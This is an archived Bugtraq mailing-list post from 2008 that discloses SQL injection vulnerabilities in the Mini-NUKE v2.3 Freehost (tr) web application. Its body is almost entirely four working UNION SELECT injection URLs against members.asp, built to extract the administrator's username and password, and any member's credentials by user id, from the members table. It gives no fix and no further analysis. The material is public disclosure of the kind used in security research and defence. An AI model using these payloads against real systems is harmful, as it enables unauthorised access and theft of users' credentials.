[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Mini-NUKE v2.3 Freehost (tr) Multiple Remote SQL Injection Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Mini-NUKE v2.3 Freehost (tr) Multiple Remote SQL Injection Vulnerabilities
From: byccc@xxxxxxxx
Date: Mon, 25 Aug 2008 14:10:14 -0600

Exploits

admin user name : 
http://localhost/mininuke/members.asp?action=member_details&uid=1+union+select+0,kul_adi,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members+where+seviye=1

admin password  : 
http://localhost/mininuke/members.asp?action=member_details&uid=1+union+select+0,sifre,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members+where+seviye=1

Learn username from id number:

http://localhost/mininuke/members.asp?action=member_details&uid=1+union+select+0,kul_adi,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members+where+uye_id=1

And then you can learn the same id's password like this.

http://localhost/mininuke/members.asp?action=member_details&uid=1+union+select+0,sifre,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members+where+uye_id=1

Script Downlad: 
http://www.aspindir.com/goster/3543

Prev by Date: ToorCon X CFP Closing and Workshops and Seminars discounted until Friday!
Next by Date: ZoneMinder Multiple Vulnerabilities
Previous by thread: ToorCon X CFP Closing and Workshops and Seminars discounted until Friday!
Next by thread: ZoneMinder Multiple Vulnerabilities
Index(es):
- Date
- Thread